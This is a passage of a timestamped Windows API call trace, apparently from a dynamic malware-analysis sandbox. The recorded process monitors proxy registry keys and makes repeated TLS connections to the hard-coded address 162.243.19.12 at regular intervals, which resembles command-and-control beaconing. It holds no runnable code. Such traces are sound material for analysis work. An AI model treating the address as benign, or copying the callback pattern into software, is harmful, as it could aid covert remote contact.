	[0468.178] GetCurrentProcess () returned 0xffffffffffffffff
	[0468.178] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0xa58) returned 1
	[0468.179] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc68bd80
	[0468.179] WinHttpSetTimeouts (hInternet=0x233fc68bd80, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0468.179] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0468.198] SetEvent (hEvent=0x6b4) returned 1
	[0468.199] select (in: nfds=0, readfds=0x233e48bb440, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e48bb440, writefds=0x0, exceptfds=0x0) returned 1
	[0468.199] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0468.202] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
	[0468.204] shutdown (s=0x7cc, how=2) returned 0
	[0468.223] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0468.223] closesocket (s=0x7cc) returned 0
	[0468.225] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0468.226] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0xa50
	[0468.226] WSAConnect (in: s=0x7cc, name=0x233e48bcbd8*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0468.335] closesocket (s=0xa50) returned 0
	[0468.336] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e48b9b80, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e48bd460, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e48bd460, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0468.338] FreeContextBuffer (in: pvContextBuffer=0x233fc686760 | out: pvContextBuffer=0x233fc686760) returned 0x0
	[0468.338] send (in: s=0x7cc, buf=0x233e48bd530*, len=333, flags=0 | out: buf=0x233e48bd530*) returned 333
	[0468.338] recv (in: s=0x7cc, buf=0x233e48bd530, len=5, flags=0 | out: buf=0x233e48bd530*) returned 5
	[0468.455] recv (in: s=0x7cc, buf=0x233e48bd535, len=49, flags=0 | out: buf=0x233e48bd535*) returned 49
	[0468.455] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e48b9b80, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48bd770, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e48bd790, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e48bd790, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0468.468] recv (in: s=0x7cc, buf=0x233e48bd880, len=5, flags=0 | out: buf=0x233e48bd880*) returned 5
	[0468.468] recv (in: s=0x7cc, buf=0x233e48bd8a5, len=1, flags=0 | out: buf=0x233e48bd8a5*) returned 1
	[0468.469] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e48b9b80, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48bd978, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e48bd998, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e48bd998, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0468.469] recv (in: s=0x7cc, buf=0x233e48bda88, len=5, flags=0 | out: buf=0x233e48bda88*) returned 5
	[0468.469] recv (in: s=0x7cc, buf=0x233e48bdaad, len=48, flags=0 | out: buf=0x233e48bdaad*) returned 48
	[0468.470] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e48b9b80, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48bdbb0, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e48bdbd0, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e48bdbd0, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x0
	[0468.474] FreeContextBuffer (in: pvContextBuffer=0x233e399c280 | out: pvContextBuffer=0x233e399c280) returned 0x0
	[0468.475] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x4, pBuffer=0x233e48bdd18 | out: pBuffer=0x233e48bdd18) returned 0x0
	[0468.475] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x5a, pBuffer=0x233e48bdd70 | out: pBuffer=0x233e48bdd70) returned 0x0
	[0468.476] QueryContextAttributesW (in: phContext=0x350199b4c0, ulAttribute=0x53, pBuffer=0x233e48bddd8 | out: pBuffer=0x233e48bddd8) returned 0x0
	[0468.477] CertDuplicateCertificateContext (pCertContext=0x233fc67f430) returned 0x233fc67f430
	[0468.477] CertDuplicateStore (hCertStore=0x233fc682a60) returned 0x233fc682a60
	[0468.477] CertEnumCertificatesInStore (hCertStore=0x233fc682a60, pPrevCertContext=0x0) returned 0x233fc67f430
	[0468.477] CertDuplicateCertificateContext (pCertContext=0x233fc67f430) returned 0x233fc67f430
	[0468.477] CertEnumCertificatesInStore (hCertStore=0x233fc682a60, pPrevCertContext=0x233fc67f430) returned 0x0
	[0468.478] CertCloseStore (hCertStore=0x233fc682a60, dwFlags=0x0) returned 1
	[0468.478] CertFreeCertificateContext (pCertContext=0x233fc67f430) returned 1
	[0468.480] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc6831b0
	[0468.480] CertAddCRLLinkToStore (in: hCertStore=0x233fc6831b0, pCrlContext=0x233fc67f430, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0468.480] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc67f430, pTime=0x350199b4c8, hAdditionalStore=0x233fc6831b0, pChainPara=0x350199b4d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b4c0 | out: ppChainContext=0x350199b4c0) returned 1
	[0468.483] CertDuplicateCertificateChain (pChainContext=0x233fc6fee10) returned 0x233fc6fee10
	[0468.485] CertDuplicateCertificateContext (pCertContext=0x233fc67f430) returned 0x233fc67f430
	[0468.485] CertDuplicateCertificateContext (pCertContext=0x233fc67ff30) returned 0x233fc67ff30
	[0468.486] CertDuplicateCertificateContext (pCertContext=0x233fc680030) returned 0x233fc680030
	[0468.486] CertFreeCertificateChain (pChainContext=0x233fc6fee10) 
	[0468.486] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233fc6fee10, pPolicyPara=0x350199b648, pPolicyStatus=0x350199b628 | out: pPolicyStatus=0x350199b628) returned 1
	[0468.486] SetLastError (dwErrCode=0x0) 
	[0468.486] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233fc6fee10, pPolicyPara=0x350199b720, pPolicyStatus=0x350199b708 | out: pPolicyStatus=0x350199b708) returned 1
	[0468.489] CertFreeCertificateChain (pChainContext=0x233fc6fee10) 
	[0468.489] CertFreeCertificateContext (pCertContext=0x233fc67f430) returned 1
	[0468.490] EncryptMessage (in: phContext=0x350199b900, fQOP=0x0, pMessage=0x233e48c09e0, MessageSeqNo=0x0 | out: pMessage=0x233e48c09e0) returned 0x0
	[0468.490] CoTaskMemAlloc (cb=0x20) returned 0x233fc6502f0
	[0468.490] WSASend (in: s=0x7cc, lpBuffers=0x233fc6502f0*=((len=0x3b, buf=0x233e48bdca0*), (len=0xd5, buf=0x233e48c07e8*)), dwBufferCount=0x2, lpNumberOfBytesSent=0x350199ba68, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x233fc6502f0*=((len=0x3b, buf=0x233e48bdca0*), (len=0xd5, buf=0x233e48c07e8*)), lpNumberOfBytesSent=0x350199ba68*=0x110, lpOverlapped=0x0) returned 0
	[0468.491] CoTaskMemFree (pv=0x233fc6502f0) 
	[0468.492] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0468.492] recv (in: s=0x7cc, buf=0x233e48c0b88, len=5, flags=0 | out: buf=0x233e48c0b88*) returned 5
	[0469.065] recv (in: s=0x7cc, buf=0x233e48c0bad, len=1488, flags=0 | out: buf=0x233e48c0bad*) returned 1488
	[0469.065] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e48c1290, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e48c1290, pfQOP=0x0) returned 0x0
	[0469.066] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0469.066] SetEvent (hEvent=0x6b4) returned 1
	[0469.107] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c
	[0490.110] CloseHandle (hObject=0x25c) returned 1
	[0490.227] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0x25c) returned 0x0
	[0490.228] RegOpenKeyExW (in: hKey=0x25c, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0x9c8) returned 0x0
	[0490.228] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x164
	[0490.228] RegNotifyChangeKeyValue (hKey=0x9c8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x164, fAsynchronous=1) returned 0x0
	[0490.229] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa64) returned 0x0
	[0490.229] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3c4
	[0490.229] RegNotifyChangeKeyValue (hKey=0xa64, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x3c4, fAsynchronous=1) returned 0x0
	[0490.231] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa80) returned 0x0
	[0490.231] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa5c
	[0490.231] RegNotifyChangeKeyValue (hKey=0xa80, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa5c, fAsynchronous=1) returned 0x0
	[0490.232] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0xa70) returned 1
	[0490.232] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc68b720
	[0490.233] WinHttpSetTimeouts (hInternet=0x233fc68b720, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0490.233] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0490.247] SetEvent (hEvent=0x6b4) returned 1
	[0490.248] select (in: nfds=0, readfds=0x233e48c8c88, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e48c8c88, writefds=0x0, exceptfds=0x0) returned 1
	[0490.248] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0490.250] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
	[0490.251] shutdown (s=0x7cc, how=2) returned 0
	[0490.260] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0490.260] closesocket (s=0x7cc) returned 0
	[0490.261] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0490.263] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9bc
	[0490.263] WSAConnect (in: s=0x7cc, name=0x233e48ca420*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0490.372] closesocket (s=0x9bc) returned 0
	[0490.373] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e48c73c8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e48caca8, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e48caca8, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0490.375] FreeContextBuffer (in: pvContextBuffer=0x233fc686bb0 | out: pvContextBuffer=0x233fc686bb0) returned 0x0
	[0490.375] send (in: s=0x7cc, buf=0x233e48cad78*, len=333, flags=0 | out: buf=0x233e48cad78*) returned 333
	[0490.375] recv (in: s=0x7cc, buf=0x233e48cad78, len=5, flags=0 | out: buf=0x233e48cad78*) returned 5
	[0490.481] recv (in: s=0x7cc, buf=0x233e48cad7d, len=49, flags=0 | out: buf=0x233e48cad7d*) returned 49
	[0490.481] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e48c73c8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48cafb8, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e48cafd8, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e48cafd8, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0490.481] recv (in: s=0x7cc, buf=0x233e48cb0c8, len=5, flags=0 | out: buf=0x233e48cb0c8*) returned 5
	[0490.481] recv (in: s=0x7cc, buf=0x233e48cb0ed, len=1, flags=0 | out: buf=0x233e48cb0ed*) returned 1
	[0490.481] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e48c73c8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48cb1c0, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e48cb1e0, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e48cb1e0, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0490.482] recv (in: s=0x7cc, buf=0x233e48cb2d0, len=5, flags=0 | out: buf=0x233e48cb2d0*) returned 5
	[0490.482] recv (in: s=0x7cc, buf=0x233e48cb2f5, len=48, flags=0 | out: buf=0x233e48cb2f5*) returned 48
	[0490.482] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e48c73c8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48cb3f8, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e48cb418, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e48cb418, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x0
	[0490.483] FreeContextBuffer (in: pvContextBuffer=0x233e399bb60 | out: pvContextBuffer=0x233e399bb60) returned 0x0
	[0490.483] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x4, pBuffer=0x233e48cb560 | out: pBuffer=0x233e48cb560) returned 0x0
	[0490.484] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x5a, pBuffer=0x233e48cb5b8 | out: pBuffer=0x233e48cb5b8) returned 0x0
	[0490.484] QueryContextAttributesW (in: phContext=0x350199b4c0, ulAttribute=0x53, pBuffer=0x233e48cb620 | out: pBuffer=0x233e48cb620) returned 0x0
	[0490.484] CertDuplicateCertificateContext (pCertContext=0x233fc680330) returned 0x233fc680330
	[0490.485] CertDuplicateStore (hCertStore=0x233fc681c90) returned 0x233fc681c90
	[0490.485] CertEnumCertificatesInStore (hCertStore=0x233fc681c90, pPrevCertContext=0x0) returned 0x233fc680330
	[0490.485] CertDuplicateCertificateContext (pCertContext=0x233fc680330) returned 0x233fc680330
	[0490.485] CertEnumCertificatesInStore (hCertStore=0x233fc681c90, pPrevCertContext=0x233fc680330) returned 0x0
	[0490.486] CertCloseStore (hCertStore=0x233fc681c90, dwFlags=0x0) returned 1
	[0490.488] CertFreeCertificateContext (pCertContext=0x233fc680330) returned 1
	[0490.490] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc683420
	[0490.490] CertAddCRLLinkToStore (in: hCertStore=0x233fc683420, pCrlContext=0x233fc680330, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0490.490] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc680330, pTime=0x350199b4c8, hAdditionalStore=0x233fc683420, pChainPara=0x350199b4d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b4c0 | out: ppChainContext=0x350199b4c0) returned 1
	[0490.492] CertDuplicateCertificateChain (pChainContext=0x233fc6ff410) returned 0x233fc6ff410
	[0490.493] CertDuplicateCertificateContext (pCertContext=0x233fc680330) returned 0x233fc680330
	[0490.494] CertDuplicateCertificateContext (pCertContext=0x233fc67ff30) returned 0x233fc67ff30
	[0490.495] CertDuplicateCertificateContext (pCertContext=0x233fc680030) returned 0x233fc680030
	[0490.495] CertFreeCertificateChain (pChainContext=0x233fc6ff410) 
	[0490.495] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233fc6ff410, pPolicyPara=0x350199b648, pPolicyStatus=0x350199b628 | out: pPolicyStatus=0x350199b628) returned 1
	[0490.495] SetLastError (dwErrCode=0x0) 
	[0490.495] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233fc6ff410, pPolicyPara=0x350199b720, pPolicyStatus=0x350199b708 | out: pPolicyStatus=0x350199b708) returned 1
	[0490.496] CertFreeCertificateChain (pChainContext=0x233fc6ff410) 
	[0490.497] CertFreeCertificateContext (pCertContext=0x233fc680330) returned 1
	[0490.498] EncryptMessage (in: phContext=0x350199b900, fQOP=0x0, pMessage=0x233e48ce228, MessageSeqNo=0x0 | out: pMessage=0x233e48ce228) returned 0x0
	[0490.498] CoTaskMemAlloc (cb=0x20) returned 0x233fc64fba0
	[0490.498] WSASend (in: s=0x7cc, lpBuffers=0x233fc64fba0*=((len=0x3b, buf=0x233e48cb4e8*), (len=0xd5, buf=0x233e48ce030*)), dwBufferCount=0x2, lpNumberOfBytesSent=0x350199ba68, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x233fc64fba0*=((len=0x3b, buf=0x233e48cb4e8*), (len=0xd5, buf=0x233e48ce030*)), lpNumberOfBytesSent=0x350199ba68*=0x110, lpOverlapped=0x0) returned 0
	[0490.499] CoTaskMemFree (pv=0x233fc64fba0) 
	[0490.499] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0490.499] recv (in: s=0x7cc, buf=0x233e48ce3d0, len=5, flags=0 | out: buf=0x233e48ce3d0*) returned 5
	[0491.028] recv (in: s=0x7cc, buf=0x233e48ce3f5, len=272, flags=0 | out: buf=0x233e48ce3f5*) returned 272
	[0491.028] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e48ce618, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e48ce618, pfQOP=0x0) returned 0x0
	[0491.030] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0491.030] recv (in: s=0x7cc, buf=0x233e48ce3f0, len=5, flags=0 | out: buf=0x233e48ce3f0*) returned 5
	[0491.030] recv (in: s=0x7cc, buf=0x233e48cfd7d, len=1248, flags=0 | out: buf=0x233e48cfd7d*) returned 1248
	[0491.030] DecryptMessage (in: phContext=0x350199bbc0, pMessage=0x233e48d0370, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e48d0370, pfQOP=0x0) returned 0x0
	[0491.030] SetEvent (hEvent=0x6b4) returned 1
	[0491.063] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c
	[0500.067] CloseHandle (hObject=0x25c) returned 1
	[0500.270] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0x25c) returned 0x0
	[0500.270] RegOpenKeyExW (in: hKey=0x25c, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0x9c8) returned 0x0
	[0500.271] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x164
	[0500.271] RegNotifyChangeKeyValue (hKey=0x9c8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x164, fAsynchronous=1) returned 0x0
	[0500.272] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa64) returned 0x0
	[0500.273] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3c4
	[0500.273] RegNotifyChangeKeyValue (hKey=0xa64, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x3c4, fAsynchronous=1) returned 0x0
	[0500.273] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa80) returned 0x0
	[0500.274] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa5c
	[0500.274] RegNotifyChangeKeyValue (hKey=0xa80, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa5c, fAsynchronous=1) returned 0x0
	[0500.274] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0xa70) returned 1
	[0500.275] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc68c3e0
	[0500.275] WinHttpSetTimeouts (hInternet=0x233fc68c3e0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0500.275] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0500.289] SetEvent (hEvent=0x6b4) returned 1
	[0500.290] select (in: nfds=0, readfds=0x233e48d6410, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e48d6410, writefds=0x0, exceptfds=0x0) returned 1
	[0500.290] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0500.291] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
	[0500.292] shutdown (s=0x7cc, how=2) returned 0
	[0500.293] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0500.293] closesocket (s=0x7cc) returned 0
	[0500.294] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0500.294] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9bc
	[0500.295] WSAConnect (in: s=0x7cc, name=0x233e48d7ba8*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0500.401] closesocket (s=0x9bc) returned 0
	[0500.401] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e48d4b50, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e48d8430, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e48d8430, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0500.402] FreeContextBuffer (in: pvContextBuffer=0x233fc686760 | out: pvContextBuffer=0x233fc686760) returned 0x0
	[0500.402] send (in: s=0x7cc, buf=0x233e48d8500*, len=333, flags=0 | out: buf=0x233e48d8500*) returned 333
	[0500.403] recv (in: s=0x7cc, buf=0x233e48d8500, len=5, flags=0 | out: buf=0x233e48d8500*) returned 5
	[0500.515] recv (in: s=0x7cc, buf=0x233e48d8505, len=49, flags=0 | out: buf=0x233e48d8505*) returned 49
	[0500.515] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e48d4b50, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48d8740, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e48d8760, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e48d8760, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0500.515] recv (in: s=0x7cc, buf=0x233e48d8850, len=5, flags=0 | out: buf=0x233e48d8850*) returned 5
	[0500.515] recv (in: s=0x7cc, buf=0x233e48d8875, len=1, flags=0 | out: buf=0x233e48d8875*) returned 1
	[0500.515] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e48d4b50, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48d8948, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e48d8968, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e48d8968, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0500.516] recv (in: s=0x7cc, buf=0x233e48d8a58, len=5, flags=0 | out: buf=0x233e48d8a58*) returned 5
	[0500.516] recv (in: s=0x7cc, buf=0x233e48d8a7d, len=48, flags=0 | out: buf=0x233e48d8a7d*) returned 48
	[0500.516] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e48d4b50, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48d8b80, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e48d8ba0, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e48d8ba0, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x0
	[0500.518] FreeContextBuffer (in: pvContextBuffer=0x233e399b560 | out: pvContextBuffer=0x233e399b560) returned 0x0
	[0500.518] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x4, pBuffer=0x233e48d8ce8 | out: pBuffer=0x233e48d8ce8) returned 0x0
	[0500.518] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x5a, pBuffer=0x233e48d8d40 | out: pBuffer=0x233e48d8d40) returned 0x0
	[0500.519] QueryContextAttributesW (in: phContext=0x350199b4c0, ulAttribute=0x53, pBuffer=0x233e48d8da8 | out: pBuffer=0x233e48d8da8) returned 0x0
	[0500.519] CertDuplicateCertificateContext (pCertContext=0x233fc6804b0) returned 0x233fc6804b0
	[0500.519] CertDuplicateStore (hCertStore=0x233fc6820a0) returned 0x233fc6820a0
	[0500.520] CertEnumCertificatesInStore (hCertStore=0x233fc6820a0, pPrevCertContext=0x0) returned 0x233fc6804b0
	[0500.520] CertDuplicateCertificateContext (pCertContext=0x233fc6804b0) returned 0x233fc6804b0
